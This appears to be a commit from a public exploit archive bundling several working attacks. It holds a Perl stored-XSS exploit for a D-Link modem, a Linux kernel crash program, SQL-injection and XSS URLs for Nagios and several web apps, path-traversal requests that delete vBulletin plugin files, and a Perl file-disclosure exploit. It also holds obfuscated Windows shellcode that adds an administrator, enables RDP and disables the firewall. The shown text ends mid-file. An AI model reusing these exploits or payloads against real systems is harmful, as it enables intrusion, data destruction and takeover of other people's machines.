# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/lancfg2.html";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}

26
platforms/linux/dos/35820.c Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/48101/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define BUFSIZE getpagesize()
int main(int argc, char **argv)
{
void *ptr;
if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) {
perror("posix_memalign");
exit(1);
}
if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
perror("madvise");
exit(1);
}
*(char *)NULL = 0;
return 0;
}

10
platforms/multiple/remote/35818.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/48087/info
Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Nagios 3.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>

120
platforms/php/webapps/35733.txt Executable file
View file

@ -0,0 +1,120 @@
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4
This plugin is fairly old but still used by a lot of people and received
its last update nearly 4 years ago.
Its vulnerable to arbitrary file deletion and SQL injection.
*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ are a bunch of files which are
probably used to manage files/folders for the administrator,
unfortunately no authentication and checks were added to see if the user
should have access to it and if the request doesnt contain anything
malicious.
The /microcart/editor/assetmanager/folderdel_.php file contains the
following on top:
$sMsg = "";
if(isset($_POST["inpCurrFolder"]))
{
$sDestination = pathinfo($_POST["inpCurrFolder"]);
//DELETE ALL FILES IF FOLDER NOT EMPTY
$dir = $_POST["inpCurrFolder"];
$handle = opendir($dir);
while($file = readdir($handle)) if($file != "." && $file != "..")
unlink($dir . "/" . $file);
closedir($handle);
if(rmdir($_POST["inpCurrFolder"])==0)
$sMsg = "";
else
$sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}
By simply sending a POST request to this file, we can delete every
single file in specified folder.
POST to: /microcart/editor/assetmanager/folderdel_.php
POST data: inpCurrFolder: ../../../
This POST request will delete every single .php file in the root folder
of vBulletin.
*Arbitrary File Deletion*
Theres another vulnerability which resides in the
/microcart/editor/assetmanager/assetmanager.php file. It contains an
upload function, which is safe, and a file deletion function, which is
not safe. We can delete any file off the server by abusing this. So
unlike the previous vulnerability I just wrote which deletes all files
by sending a POST request with a folder value, this will only delete 1
file off the server.
Vulnerable code:
if(isset($_POST["inpFileToDelete"]))
{
$filename=pathinfo($_POST["inpFileToDelete"]);
$filename=$filename['basename'];
if($filename!="")
unlink($currFolder . "/" . $filename);
$sMsg = "";
}
Exploited by sending the following request:
POST to: /microcart/editor/assetmanager/assetmanager.php
POST data: inpCurrFolder: ../../../
inpFileToDelete: index.php
This will delete the /index.php file of vBulletin, in the root.
*Aribtrary Folder Creation*
Besides the file deletion, theres a file called
/microcart/editor/assetmanager/foldernew.php which created a 0755
chmodded folder on the server.
The file contains the following on top:
$sMsg = "";
if(isset($_POST["inpNewFolderName"]))
{
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
if(is_dir($sFolder)==1)
{//folder already exist
$sMsg = "<script>document.write(getTxt('Folder already
exists.'))</script>";
}
else
{
//if(mkdir($sFolder))
if(mkdir($sFolder,0755))
$sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
else
$sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
}
}
By sending the following POST request, we will create a folder with 0755
chmodded permission.
POST to: /microcart/editor/assetmanager/foldernew.php
POST data: inpNewFolderName: davewashere
inpCurrFolder: ../../..
This POST request will create the folder davewashere in the root of the
vBulletin forum.
*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations
although most of them are rather hard to abuse. I will not explain how
to exploit it, but the vulnerability can be found at /cart.php line 833
to 881 and the function where you can add products to your shopping
cart, at around line 1251 to 1328 where $_POST[fields] is assigned to
the configuration variable which is later used in a query.
*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject
anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out
the wysiwyg POST key.

11
platforms/php/webapps/35814.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/48067/info
TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected.
http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4

51
platforms/php/webapps/35815.pl Executable file
View file

@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/48068/info
PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.
Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit *\n";
print "\* Exploited By : KnocKout *\n";
print "\* Contact : knockoutr[at]msn[dot]com *\n";
print "\* -- *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
\n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}

17
platforms/php/webapps/35816.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/48083/info
ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected.
SQL injection:
http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202
Cross-site Scripting:
http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

9
platforms/php/webapps/35819.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48100/info
Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Ushahidi 2.0.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]

442
platforms/win32/shellcode/35793.txt Executable file
View file

@ -0,0 +1,442 @@
#Author: Ali Razmjoo
??#Title: ?Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
Obfuscated Shellcode Windows x86 [1218 Bytes].c
/*
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#length: 1218 bytes
#Date: 13 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x86 ultimate
WinExec => 0x7666e695
ExitProcess => 0x76632acf
====================================
Execute :
net user ALI ALI /add
net localgroup Administrators ALI /add
NET LOCALGROUP "Remote Desktop Users" ALI /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
netsh firewall set opmode disable
sc config termservice start= auto
====================================
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: b8 41 41 41 64 mov $0x64414141,%eax
8: c1 e8 08 shr $0x8,%eax
b: c1 e8 08 shr $0x8,%eax
e: c1 e8 08 shr $0x8,%eax
11: 50 push %eax
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
17: ba 4d 59 32 36 mov $0x3632594d,%edx
1c: 31 d1 xor %edx,%ecx
1e: 51 push %ecx
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
29: 31 d1 xor %edx,%ecx
2b: 51 push %ecx
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
31: ba 4c 34 34 31 mov $0x3134344c,%edx
36: 31 d1 xor %edx,%ecx
38: 51 push %ecx
39: b9 46 47 57 46 mov $0x46574746,%ecx
3e: ba 33 34 32 34 mov $0x34323433,%edx
43: 31 d1 xor %edx,%ecx
45: 51 push %ecx
46: b9 56 50 47 64 mov $0x64475056,%ecx
4b: ba 38 35 33 44 mov $0x44333538,%edx
50: 31 d1 xor %edx,%ecx
52: 51 push %ecx
53: 89 e0 mov %esp,%eax
55: bb 41 41 41 01 mov $0x1414141,%ebx
5a: c1 eb 08 shr $0x8,%ebx
5d: c1 eb 08 shr $0x8,%ebx
60: c1 eb 08 shr $0x8,%ebx
63: 53 push %ebx
64: 50 push %eax
65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
6a: ba 33 52 64 59 mov $0x59645233,%edx
6f: 31 d3 xor %edx,%ebx
71: ff d3 call *%ebx
73: 31 c0 xor %eax,%eax
75: 50 push %eax
76: 68 41 41 64 64 push $0x64644141
7b: 58 pop %eax
7c: c1 e8 08 shr $0x8,%eax
7f: c1 e8 08 shr $0x8,%eax
82: 50 push %eax
83: b9 01 41 60 32 mov $0x32604101,%ecx
88: ba 48 61 4f 53 mov $0x534f6148,%edx
8d: 31 d1 xor %edx,%ecx
8f: 51 push %ecx
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
9a: 31 d1 xor %edx,%ecx
9c: 51 push %ecx
9d: b9 03 24 36 21 mov $0x21362403,%ecx
a2: ba 62 50 59 53 mov $0x53595062,%edx
a7: 31 d1 xor %edx,%ecx
a9: 51 push %ecx
aa: b9 34 41 15 18 mov $0x18154134,%ecx
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
b4: 31 d1 xor %edx,%ecx
b6: 51 push %ecx
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
bc: ba 68 68 72 4b mov $0x4b726868,%edx
c1: 31 d1 xor %edx,%ecx
c3: 51 push %ecx
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
ce: 31 d1 xor %edx,%ecx
d0: 51 push %ecx
d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
db: 31 d1 xor %edx,%ecx
dd: 51 push %ecx
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
e3: ba 51 45 51 2d mov $0x2d514551,%edx
e8: 31 d1 xor %edx,%ecx
ea: 51 push %ecx
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
f5: 31 d1 xor %edx,%ecx
f7: 51 push %ecx
f8: 89 e0 mov %esp,%eax
fa: bb 41 41 41 01 mov $0x1414141,%ebx
ff: c1 eb 08 shr $0x8,%ebx
102: c1 eb 08 shr $0x8,%ebx
105: c1 eb 08 shr $0x8,%ebx
108: 53 push %ebx
109: 50 push %eax
10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
10f: ba 33 52 64 59 mov $0x59645233,%edx
114: 31 d3 xor %edx,%ebx
116: ff d3 call *%ebx
118: 31 c0 xor %eax,%eax
11a: 50 push %eax
11b: 68 41 41 64 64 push $0x64644141
120: 58 pop %eax
121: c1 e8 08 shr $0x8,%eax
124: c1 e8 08 shr $0x8,%eax
127: 50 push %eax
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
132: 31 d1 xor %edx,%ecx
134: 51 push %ecx
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
13f: 31 d1 xor %edx,%ecx
141: 51 push %ecx
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
147: ba 54 5a 49 69 mov $0x69495a54,%edx
14c: 31 d1 xor %edx,%ecx
14e: 51 push %ecx
14f: b9 25 34 12 67 mov $0x67123425,%ecx
154: ba 4a 44 32 32 mov $0x3232444a,%edx
159: 31 d1 xor %edx,%ecx
15b: 51 push %ecx
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
166: 31 d1 xor %edx,%ecx
168: 51 push %ecx
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
173: 31 d1 xor %edx,%ecx
175: 51 push %ecx
176: b9 35 15 03 2a mov $0x2a031535,%ecx
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
180: 31 d1 xor %edx,%ecx
182: 51 push %ecx
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
188: ba 6f 47 55 64 mov $0x6455476f,%edx
18d: 31 d1 xor %edx,%ecx
18f: 51 push %ecx
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
195: ba 6a 72 59 51 mov $0x5159726a,%edx
19a: 31 d1 xor %edx,%ecx
19c: 51 push %ecx
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
1a7: 31 d1 xor %edx,%ecx
1a9: 51 push %ecx
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
1af: ba 53 65 61 7a mov $0x7a616553,%edx
1b4: 31 d1 xor %edx,%ecx
1b6: 51 push %ecx
1b7: 89 e0 mov %esp,%eax
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
1be: c1 eb 08 shr $0x8,%ebx
1c1: c1 eb 08 shr $0x8,%ebx
1c4: c1 eb 08 shr $0x8,%ebx
1c7: 53 push %ebx
1c8: 50 push %eax
1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
1ce: ba 33 52 64 59 mov $0x59645233,%edx
1d3: 31 d3 xor %edx,%ebx
1d5: ff d3 call *%ebx
1d7: 31 c0 xor %eax,%eax
1d9: 50 push %eax
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
1e4: 31 d1 xor %edx,%ecx
1e6: 51 push %ecx
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
1f1: 31 d1 xor %edx,%ecx
1f3: 51 push %ecx
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
1fe: 31 d1 xor %edx,%ecx
200: 51 push %ecx
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
20b: 31 d1 xor %edx,%ecx
20d: 51 push %ecx
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
213: ba 53 5b 77 44 mov $0x44775b53,%edx
218: 31 d1 xor %edx,%ecx
21a: 51 push %ecx
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
225: 31 d1 xor %edx,%ecx
227: 51 push %ecx
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
232: 31 d1 xor %edx,%ecx
234: 51 push %ecx
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
23a: ba 63 44 48 48 mov $0x48484463,%edx
23f: 31 d1 xor %edx,%ecx
241: 51 push %ecx
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
247: ba 66 52 77 34 mov $0x34775266,%edx
24c: 31 d1 xor %edx,%ecx
24e: 51 push %ecx
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
259: 31 d1 xor %edx,%ecx
25b: 51 push %ecx
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
261: ba 45 47 32 41 mov $0x41324745,%edx
266: 31 d1 xor %edx,%ecx
268: 51 push %ecx
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
26e: ba 71 45 68 49 mov $0x49684571,%edx
273: 31 d1 xor %edx,%ecx
275: 51 push %ecx
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
280: 31 d1 xor %edx,%ecx
282: 51 push %ecx
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
28d: 31 d1 xor %edx,%ecx
28f: 51 push %ecx
290: b9 34 23 23 3b mov $0x3b232334,%ecx
295: ba 68 77 46 49 mov $0x49467768,%edx
29a: 31 d1 xor %edx,%ecx
29c: 51 push %ecx
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
2a2: ba 73 48 65 78 mov $0x78654873,%edx
2a7: 31 d1 xor %edx,%ecx
2a9: 51 push %ecx
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
2b4: 31 d1 xor %edx,%ecx
2b6: 51 push %ecx
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
2c1: 31 d1 xor %edx,%ecx
2c3: 51 push %ecx
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
2ce: 31 d1 xor %edx,%ecx
2d0: 51 push %ecx
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
2db: 31 d1 xor %edx,%ecx
2dd: 51 push %ecx
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
2e3: ba 49 62 78 52 mov $0x52786249,%edx
2e8: 31 d1 xor %edx,%ecx
2ea: 51 push %ecx
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
2f0: ba 61 31 67 75 mov $0x75673161,%edx
2f5: 31 d1 xor %edx,%ecx
2f7: 51 push %ecx
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
2fd: ba 62 64 68 73 mov $0x73686462,%edx
302: 31 d1 xor %edx,%ecx
304: 51 push %ecx
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
30a: ba 36 33 78 69 mov $0x69783336,%edx
30f: 31 d1 xor %edx,%ecx
311: 51 push %ecx
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
317: ba 31 52 4c 67 mov $0x674c5231,%edx
31c: 31 d1 xor %edx,%ecx
31e: 51 push %ecx
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
324: ba 58 49 79 72 mov $0x72794958,%edx
329: 31 d1 xor %edx,%ecx
32b: 51 push %ecx
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
336: 31 d1 xor %edx,%ecx
338: 51 push %ecx
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
33e: ba 34 58 54 52 mov $0x52545834,%edx
343: 31 d1 xor %edx,%ecx
345: 51 push %ecx
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
350: 31 d1 xor %edx,%ecx
352: 51 push %ecx
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
358: ba 4b 47 39 70 mov $0x7039474b,%edx
35d: 31 d1 xor %edx,%ecx
35f: 51 push %ecx
360: 89 e0 mov %esp,%eax
362: bb 41 41 41 01 mov $0x1414141,%ebx
367: c1 eb 08 shr $0x8,%ebx
36a: c1 eb 08 shr $0x8,%ebx
36d: c1 eb 08 shr $0x8,%ebx
370: 53 push %ebx
371: 50 push %eax
372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
377: ba 33 52 64 59 mov $0x59645233,%edx
37c: 31 d3 xor %edx,%ebx
37e: ff d3 call *%ebx
380: 31 c0 xor %eax,%eax
382: 50 push %eax
383: b8 41 41 41 65 mov $0x65414141,%eax
388: c1 e8 08 shr $0x8,%eax
38b: c1 e8 08 shr $0x8,%eax
38e: c1 e8 08 shr $0x8,%eax
391: 50 push %eax
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
39c: 31 d1 xor %edx,%ecx
39e: 51 push %ecx
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
3a9: 31 d1 xor %edx,%ecx
3ab: 51 push %ecx
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
3b1: ba 69 73 62 75 mov $0x75627369,%edx
3b6: 31 d1 xor %edx,%ecx
3b8: 51 push %ecx
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
3be: ba 45 35 67 59 mov $0x59673545,%edx
3c3: 31 d1 xor %edx,%ecx
3c5: 51 push %ecx
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
3cb: ba 47 69 44 59 mov $0x59446947,%edx
3d0: 31 d1 xor %edx,%ecx
3d2: 51 push %ecx
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
3dd: 31 d1 xor %edx,%ecx
3df: 51 push %ecx
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
3ea: 31 d1 xor %edx,%ecx
3ec: 51 push %ecx
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
3f7: 31 d1 xor %edx,%ecx
3f9: 51 push %ecx
3fa: 89 e0 mov %esp,%eax
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
401: c1 eb 08 shr $0x8,%ebx
404: c1 eb 08 shr $0x8,%ebx
407: c1 eb 08 shr $0x8,%ebx
40a: 53 push %ebx
40b: 50 push %eax
40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
411: ba 33 52 64 59 mov $0x59645233,%edx
416: 31 d3 xor %edx,%ebx
418: ff d3 call *%ebx
41a: 31 c0 xor %eax,%eax
41c: 50 push %eax
41d: b8 41 41 41 6f mov $0x6f414141,%eax
422: c1 e8 08 shr $0x8,%eax
425: c1 e8 08 shr $0x8,%eax
428: c1 e8 08 shr $0x8,%eax
42b: 50 push %eax
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
436: 31 d1 xor %edx,%ecx
438: 51 push %ecx
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
43e: ba 35 48 71 6f mov $0x6f714835,%edx
443: 31 d1 xor %edx,%ecx
445: 51 push %ecx
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
450: 31 d1 xor %edx,%ecx
452: 51 push %ecx
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
45d: 31 d1 xor %edx,%ecx
45f: 51 push %ecx
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
465: ba 41 77 48 75 mov $0x75487741,%edx
46a: 31 d1 xor %edx,%ecx
46c: 51 push %ecx
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
472: ba 53 59 4e 77 mov $0x774e5953,%edx
477: 31 d1 xor %edx,%ecx
479: 51 push %ecx
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
47f: ba 72 32 78 41 mov $0x41783272,%edx
484: 31 d1 xor %edx,%ecx
486: 51 push %ecx
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
491: 31 d1 xor %edx,%ecx
493: 51 push %ecx
494: 89 e0 mov %esp,%eax
496: bb 41 41 41 01 mov $0x1414141,%ebx
49b: c1 eb 08 shr $0x8,%ebx
49e: c1 eb 08 shr $0x8,%ebx
4a1: c1 eb 08 shr $0x8,%ebx
4a4: 53 push %ebx
4a5: 50 push %eax
4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
4ab: ba 33 52 64 59 mov $0x59645233,%edx
4b0: 31 d3 xor %edx,%ebx
4b2: ff d3 call *%ebx
4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx
4b9: ba 36 54 3d 54 mov $0x543d5436,%edx
4be: 31 d3 xor %edx,%ebx
4c0: ff d3 call *%ebx
*/
#include <stdio.h>
#include <string.h>
int main(){
